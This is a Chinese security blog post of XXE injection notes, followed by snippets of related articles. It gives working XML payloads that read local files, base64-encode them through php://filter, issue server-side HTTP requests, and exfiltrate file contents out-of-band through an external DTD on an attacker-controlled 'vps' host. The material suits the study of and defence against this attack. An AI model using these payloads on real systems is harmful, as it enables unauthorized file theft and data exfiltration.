xxe重点内容

最新推荐文章于 2024-04-02 16:28:04 发布
最新推荐文章于 2024-04-02 16:28:04 发布
阅读量1k 收藏
点赞数
分类专栏: 网络安全 文章标签: 前端 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Thegentlest/article/details/126687905
版权

XXE重点内容

基础知识:https://www.cnblogs.com/l0nmar/p/13339015.html

1.xxe读取本地文件

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [
	<!ENTITY xxe SYSTEM "file:///c:/windows/system.ini">
]>
<root>&xxe;</root>

2.当读取的本地文件内容包含 < & 等特殊字符时,读取会报错,此时有两种方法

  • 采用CDATA、PCDATA等方式,在外部dtd拼接读取。详见:https://www.bilibili.com/video/BV1Ty4y1Y7gs?p=21&spm_id_from=pageDriver&vd_source=ed55cea68ca30d00bac42f61348f3d9a
  • 结合php伪协议,php://filter/read=convert.base64-encode/resource=c:/windows/system.ini
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [
	<!ENTITY xxe SYSTEM "php://filter/read=convert.base64-encode/resource=c:/windows/system.ini">
]>
<root>&xxe;</root>

3.xxe发起http请求

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [
	<!ENTITY xxe SYSTEM "http://ip:port/path">
]>
<root>&xxe;</root>
4.当target主机没有回显时,需要外带out-of-band(OOB)

攻击者发送http数据包, 携带xml数据, 此时需要在外部dtd文件进行参数实体的拼接。

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE convert 
[
<!ENTITY % remote SYSTEM "http://vps:放置dtd文件的端口/xx.dtd" >
%remote;%int;%send;]>

我们要在vps上放置dtd文件,如下

<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=要读取的内容">
<!ENTITY % int "<!ENTITY &#37; send SYSTEM 'http://vps:接收回显数据的端口/?p=%file;'>">

发送该请求即可,该方法需要目标主机能够出网。

Thegentlest
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
文件读取 xxe_XXE
weixin_36165398的博客
01-14 729
一、 XXE是什么?有哪些危害?XML外部实体,允许XML引用外部数据作为变量。形式如下。]><user><username>&xxe;username><password>adminpassword>user>由于外部实体允许多种协议,所以XXE等同于任意文件读取+SSRFXXE靶场https://github....
windows文件读取 xxe_XXE漏洞利用方式详解
weixin_35029653的博客
12-11 604
XXE漏洞的详细原理解释和利用中,XXE的基本原理还有简单的文件读取利用方式我们已经有了基本的了解,那么接下来就带来我们的XXE漏洞详解——进阶篇!xxe漏洞利用在实战中往往会遇到很多的问题,也需要更多种多样的利用方式和技巧,本片就给大家一一介绍~读取文件时有特殊符号在读取文件时,文件中包含"<,>,&"等这些特殊符号时,会被xml解析器解析,报错从而导致读取失败,例如尝试读...
XXE文件随意读取
weixin_48421613的博客
09-03 1810
XXE的利用 声明: 我们本次实验所使用的php版本为5.4版本,有些版本是实验不成功的 XXE注入可分为有回显的与没有回显的 有回显的:制造一个具有xxe漏洞的代码(xxe.php) <?php $xml=simplexml_load_string($_GET['xml']); echo $xml; //这是有回显的xxe注入 ?> 首先我们使用我们本地的服务器进行探测,使用burpsuite进行抓板进行分析 我们可以看到我们提交的参数已经出
浅谈 XXE 漏洞任意文件读取
枫梓林のBlog
05-02 3740
浅谈 XXE 漏洞任意文件读取 文章目录浅谈 XXE 漏洞任意文件读取0x00 前言0x01 XML 基础知识1.什么是XML2.XML 语法2.1 语法规则2.2 XML 结构2.3 XML DTD(文档类型定义)3.XML 注入时的两大要素0x02 XXE 漏洞攻击1.XXE 漏洞演示2.读取 PHP 文件0x03 XXE 漏洞代码分析1.file_get_contents()2.simplexml_load_string 函数介绍3.XXE 注入的思路0x04 无回显文件读取1.实验环境介绍2.实验
文件读取 xxe_关于XML解析的外部实例引用漏洞攻击XXE
weixin_35914716的博客
01-15 467
XXE全称是——XML External Entity,也就是XML外部实体注入攻击。该漏洞的核心主要是在对不安全的外部实体数据进行处理时引发的安全攻击问题。如果攻击者可以上传XML文档、或HTTP通信过程中采用XML格式传输数据,并且能够在XML文档中添加恶意内容,他们就能够攻击含有缺陷的XML处理器。XXE漏洞触发的点往往是可以上传xml文件的位置,没有对上传的xml文件进行...
第五节 XXE漏洞利用 - 任意文件读取 无回显 -01
09-15
攻击者可以使用 gedit 将 test.dtd 中的内容设置为以下文件内容: 然后,攻击者可以使用 Wireshark 抓取 HTTP 包,查看服务器的响应信息。 XXE 漏洞利用是 Web 应用程序安全中的一种常见的攻击方式。攻击者可以...
XXE - 防御策略-01
09-15
XXE 防御策略 XXE(Xml External Entity)漏洞是一种常见的 XML 解析漏洞,攻击者可以通过构造恶意 XML 文档来读取敏感信息或执行系统命令。为了防御 XXE 漏洞,需要了解其成因和防御策略。 一、XXE 漏洞消亡原因 ...
XXE漏洞详解【内含vulnhub靶场XXE Lab:1详解】
07-30
内含xxe漏洞原理,以及该漏洞的多种利用方式,同时根据八个具体案例详细描述漏洞的利用方式。 【想要搭建vulnhub内靶场可关注博主,然后私聊我哦】 同时内含vulnhub中xxe lab:1靶场的过关记录 渗透思路: 由于网站...
5、XXE漏洞pdf资料
10-15
5、XXE漏洞
xxe 6.5 完美破解
03-03
1、首先到官网上下载安装xxe 6.5版本,安装完成后不要急着打开 2、打开XMLmind_XML_Editor\bin\xxe.jar,找到com\xmlmind\xmleditapp\app\DesktopApp.class替换成我给的DesktopApp.class就行了 3、现在就可以...
33-3 XXE漏洞 - XXE外部实体注入(文件读取
最新发布
weixin_43263566的博客
04-02 298
这个XML文档看起来很简单,但实际上它包含了一种XML外部实体注入(XXE)攻击。通过在DTD中定义恶意实体并在XML文档中引用它们,攻击者可以利用XXE漏洞来读取敏感文件、执行命令或进行其他恶意操作。实体可以在XML文档中被引用,类似于变量,在文档解析过程中会被替换为其定义的值。:这是DOCTYPE声明,用于指定XML文档的文档类型定义(DTD)。,但实际上它可以被定义为任何攻击者想要的内容,包括文件路径、命令等。:这是XML文档的声明部分,指定了XML版本和字符编码。:在DTD中定义了一个实体。
Web安全 XXE漏洞的 测试和利用.(读取服务器的任何文件 和 收集服务器的内网信息.)
网络安全领域___专研者.
03-08 6394
XXE漏洞全称(XML External Entity Injection),即XML外部实体注入漏洞,XXE漏洞发生在应用程序解析XML输入时,没有禁止外部实体的加载,导致可加载恶意外部文件,造成:文件读取、命令执行、内网端口扫描、攻击内网网站,DOS攻击 等危害.(xxe漏洞触发的点往往是可以上传xml文件的位置的,没有对上传的xml文件进行过滤,导致可上传恶意xml文件.)
XXE读取文件 Geek10th
weixin_44377940的博客
11-14 992
点开网站: 抓包,修改属性: 返回了这么一串: 由于是$name==md5(),由弱类型比较和md5想到md5碰撞,
文件读取 xxe_漏洞笔记|记一次与XXE漏洞的爱恨纠缠
weixin_31641077的博客
01-15 408
0x01背景:kaiputenku大佬最近在挖洞的时候偶遇一枚XXE漏洞,身经百战的他经过一番爱恨纠缠,终将她顺利拿下~0x02纠缠一番只为她-Blind OOB XXE: 在测试某系统的某查询功能模块如下:查询模块.jpg(请各位大佬自行脑补)下面即将开始kaiputenku的表演:首先使用burp抓包,发现提交xml形式的数据包,很容易想到可能存在XML外部实体注入...
windows文件读取 xxe_Web应用常见漏洞浅析:XXE任意文件读写漏洞、远程代码执行……...
weixin_39551993的博客
12-22 598
原标题:Web应用常见漏洞浅析:XXE任意文件读写漏洞、远程代码执行…… 你的Web应用是否存在XXE漏洞? 如果你的应用是通过用户上传处理XML文件或POST请求(例如将SAML用于单点登录服务甚至是RSS)的,那么你很有可能会受到XXE的攻击。XXE是一种非常常见的漏洞类型,我们几乎每天都会碰到它。在去年的几次web应用渗透中,我们就成功的利用了好几回。什么是XXE“简单来说,XXE就是XML...
windows文件读取 xxe_XXE原理及利用
weixin_35387118的博客
12-21 1244
“一个人的伟大之处乃在于他是一座桥梁,而不是目的。By尼采”一XXE原理01XML 简介XML 指可扩展标记语言(EXtensible Markup Language),和HTML很类似,但XML的设计目的是传输数据而非显示数据,且XML没有预定义的标签,因此需要自行定义标签。下面是一个XML文档的实例。GeorgeJohnReminderDon't forget the meeting...
iwebsec XXE漏洞
weixin_44135070的博客
01-22 714
使用POST方式提交数据,这里用到火狐的插件hackbar,首先点击load URL,再勾选post data按钮,将构造好的XML恶意代码放入post框内,点击Execute进行post数据。
XXE漏洞学习
qq_62078839的博客
04-23 389
漏洞原理 XXE漏洞就是XML外部实体注入,就是当xml引用外部实体并解析的时候会产生的漏洞,xml解析器去获取其中的外部资源并存储到内部实体中,攻击者可引用外部实体对目标进行文件读取、命令执行、DDOS、内网探测等。 利用方式 命令执行 <?xml version="1.0" encoding="utf-8"?> <!DOCTYPE a[ <!ENTITY test SYSTEM "命令"> ]> <c>&test</c>
XEE漏洞任意文件读取
m0_58001548的博客
04-30 1863
XXE全称是——XML External Entity,也就是XML外部实体注入攻击。通过 XML实体,"SYSTEM”关键词导致XML解析器可以从本地文件或者远程URI中读取数据。所以攻击者可以通过XML实体传递自己构造的恶意值,使处理程序解析它。当引用外部实体时,通过构造恶意内容,可导致读取任意文件、执行系统命令、探测内网端口、攻击内网网站等危害。XML指可扩展标记语言(Extensible Markup Language)XML是一种标记语言,很类似HTML。
ctfshow XXE
09-02
XXE (XML External Entity) 是一种常见的网络漏洞,它发生在应用程序未正确处理外部实体引用时。这个漏洞可以导致攻击者读取服务器上的文件、执行远程请求或进行其他恶意操作。 在 CTF 比赛中,XXE 漏洞是一个常见的题目类型。通常,你会被给予一个可控制 XML 输入的应用程序,并需要利用 XXE 漏洞来获取敏感信息或实现特定的目标。 要利用 XXE 漏洞,你可以尝试以下方法: 1. 通过在 XML 输入中引用外部实体来读取文件内容。例如,可以使用 `<!DOCTYPE root [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>` 来引用 `/etc/passwd` 文件并将其内容返回到响应中。 2. 如果应用程序允许向外部实体发送网络请求,你可以尝试通过 XXE 漏洞执行 SSRF (Server-Side Request Forgery) 攻击。通过在 XML 输入中定义一个带有远程 URL 的实体引用,然后强制应用程序发送请求到该 URL,从而执行任意的 HTTP 请求。 这只是 XXE 漏洞的基本概念,具体的利用方法还会因应用程序的不同而有所变化。在 CTF 比赛中,你可能需要结合其他漏洞或技术来实现攻击目标。记住,在真实环境中测试漏洞时,应始终获得合法的授权,并遵循法律和道德准则。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值